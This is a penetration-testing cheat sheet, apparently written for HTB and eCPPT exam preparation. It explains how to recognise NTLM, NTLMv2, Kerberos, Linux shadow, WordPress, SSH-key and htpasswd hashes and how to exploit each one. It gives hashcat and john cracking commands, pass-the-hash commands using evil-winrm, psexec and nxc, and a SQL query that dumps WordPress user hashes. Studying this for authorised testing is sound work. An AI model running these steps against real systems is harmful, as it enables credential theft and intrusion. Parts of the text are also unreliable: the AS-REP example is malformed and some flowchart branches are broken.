Hash Types — Situational Examples
For each hash type: where you find it, a real scenario, what it looks like, and exactly what to do when you see it.
1. NTLM Hash (Windows SAM / secretsdump)
Real scenario (example):
You ran impacket-secretsdump and got this line:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa3b347fb64a282e89bae4:::
Breaking this apart:
Administrator = username
500 = RID (500 = built-in admin)
aad3b435... = LM hash (empty/disabled — IGNORE this part)
32693b11e6aa... = NTLM hash (THIS is what you want)
Can you crack it? YES
# Extract just the NTLM part (after the second colon)
hashcat -m 1000 ntlm.hash rockyou.txt
Should you crack it? NO — Pass-the-Hash is faster
# Why waste time cracking when you can just USE the hash directly?
evil-winrm -i $ip -u Administrator -H '32693b11e6aa3b347fb64a282e89bae4'
impacket-psexec DOMAIN/Administrator@$ip -hashes :32693b11e6aa3b347fb64a282e89bae4
nxc smb $ip -u Administrator -H '32693b11e6aa3b347fb64a282e89bae4'
The lesson:
NTLM hashes from secretsdump or SAM dumps are like master keys. You dont need to know the actual password. Windows accepts the hash directly as authentication. Cracking is optional — Pass-the-Hash is instant.
When you DO need to crack NTLM:
- When you need to RDP and the machine only accepts passwords (not hashes)
- When you want to spray the actual password against other services (like web apps)
2. NTLMv2 Hash (Responder captures)
Real scenario:
You’re running Responder on the network and capture this:
svc_backup::HTB:1122334455667788:AAF8B0B...long blob...:0101000000000000
Can you crack it? YES — you MUST crack it
hashcat -m 5600 captured.hash rockyou.txt
Can you Pass-the-Hash? NO
NTLMv2 hashes CANNOT be used for Pass-the-Hash. They are challenge-response hashes tied to a specific session. You must crack them to get the plaintext password.
The difference from NTLM:
- NTLM (from SAM dump) = the stored hash. Can be reused directly.
- NTLMv2 (from Responder) = a one-time challenge-response. Must be cracked.
3. AS-REP Hash (AS-REP Roasting)
Real scenario (example):
You ran impacket-GetNPUsers and got:
[email protected]:7e52e82c669eac43e4f548297b9d772f$...long blob...
How to recognize it:
Starts with $krb5asrep$23$ — that prefix is unique to AS-REP hashes.
How to crack:
hashcat -m 18200 asrep.hash rockyou.txt
# or
john asrep.hash --wordlist=rockyou.txt
Can you use it without cracking? NO
Unlike NTLM, you cannot pass an AS-REP hash. You must crack it to get the plaintext password.
Why it exists:
The account has “Do not require Kerberos pre-authentication” enabled. The DC hands you a blob encrypted with the user’s password. You crack the blob to recover the password.
4. TGS Hash (Kerberoasting)
Real scenario (example):
You ran impacket-GetUserSPNs and got:
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$a1b2c3...long blob...
How to recognize it:
Starts with $krb5tgs$23$ — that prefix is unique to Kerberoasting hashes.
How to crack:
hashcat -m 13100 kerberoast.hash rockyou.txt
# or
john kerberoast.hash --wordlist=rockyou.txt
Can you use it without cracking? NO
Same as AS-REP — must crack it to get the plaintext password.
How to remember AS-REP vs TGS:
$krb5asrep$ = AS-REP Roasting = hashcat -m 18200 = no creds needed
$krb5tgs$ = Kerberoasting = hashcat -m 13100 = creds needed
Look at the hash prefix and you know exactly which it is.
5. Linux Shadow Hash (/etc/shadow)
Real scenario:
You read /etc/shadow on a Linux box and find:
root:$6$xyz123$LongHashStringHere...:19000:0:99999:7:::
How to recognize it:
The $6$ tells you its SHA-512. The number after the first $ sign tells you the hash type:
$1$ = MD5 → hashcat -m 500
$5$ = SHA-256 → hashcat -m 7400
$6$ = SHA-512 → hashcat -m 1800 (most common on modern Linux)
How to crack:
# Copy the full hash including $6$ and salt
echo '$6$xyz123$LongHashStringHere...' > shadow.hash
hashcat -m 1800 shadow.hash rockyou.txt
Linux shadow hashes are SLOW to crack
SHA-512 with salt is designed to be slow. Rockyou might take hours. Try smaller wordlists first.
6. WordPress Hash (phpass)
Real scenario (eCPPT will test WordPress):
You dump the WordPress database and find in wp_users:
admin:$P$BcDsN.F.MIGwMEFfZ3kG6IN0sTqGWs1
How to recognize it:
Starts with $P$ — unique to WordPress/phpass hashes.
How to crack:
hashcat -m 400 wp_hash.txt rockyou.txt
# or
john wp_hash.txt --wordlist=rockyou.txt
How you get WordPress hashes:
- SQL injection that dumps the wp_users table
- Direct access to MySQL:
SELECT user_login, user_pass FROM wp_users; - Finding wp-config.php → get DB creds → connect to MySQL → dump users
7. SSH Key Passphrase
Real scenario:
You find an id_rsa private key file but it’s password-protected:
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25...
The word “ENCRYPTED” tells you it needs a passphrase.
How to crack:
# Step 1: Convert to crackable format
ssh2john id_rsa > ssh_hash.txt
# Step 2: Crack with john (preferred for SSH keys)
john ssh_hash.txt --wordlist=rockyou.txt
Do NOT feed the raw id_rsa file to hashcat — it only reads extracted hashes, not key files. You get “Separator unmatched” on every line. If you must use hashcat: hashcat -m 22921 ssh_hash.txt rockyou.txt (using the ssh2john output, not the raw key).
Then use the key with the cracked passphrase:
chmod 600 id_rsa
ssh -i id_rsa user@target
# Enter passphrase when prompted
8. Apache .htpasswd
Real scenario: Apache .htpasswd file
You find a .htpasswd file:
admin:$apr1$salt$hashedpasswordhere
How to recognize:
Starts with $apr1$ — unique to Apache htpasswd.
How to crack:
hashcat -m 1600 htpasswd.hash rockyou.txt
john htpasswd.hash --wordlist=rockyou.txt
DECISION FLOWCHART: What do I do with this hash?
Found a hash
│
├── Is it an NTLM hash from SAM/secretsdump? (32 hex chars, from Windows)
│ → TRY PASS-THE-HASH FIRST (evil-winrm -H, psexec -hashes)
│ → Only crack if you need the actual password
│
├── Is it from Responder/relay? (NTLMv2, long with ::)
│ → MUST CRACK IT (hashcat -m 5600)
│ → Cannot pass-the-hash with NTLMv2
│
│ → AS-REP hash → hashcat -m 18200
│
│ → Kerberoast hash → hashcat -m 13100
│
├── Does it start with $6$ or $5$ or $1$?
│ → Linux shadow → $6$=1800, $5$=7400, $1$=500
│
├── Does it start with $P$?
│ → WordPress → hashcat -m 400
│
├── Does it start with $apr1$?
│ → Apache htpasswd → hashcat -m 1600
│
├── Is it a 32 character hex string with no prefix?
│ → Probably MD5 → hashcat -m 0
│
├── Is it a 40 character hex string?
│ → Probably SHA1 → hashcat -m 100
│
└── Dont know?
→ Run: hashid 'paste_hash_here'
→ Or: hash-identifier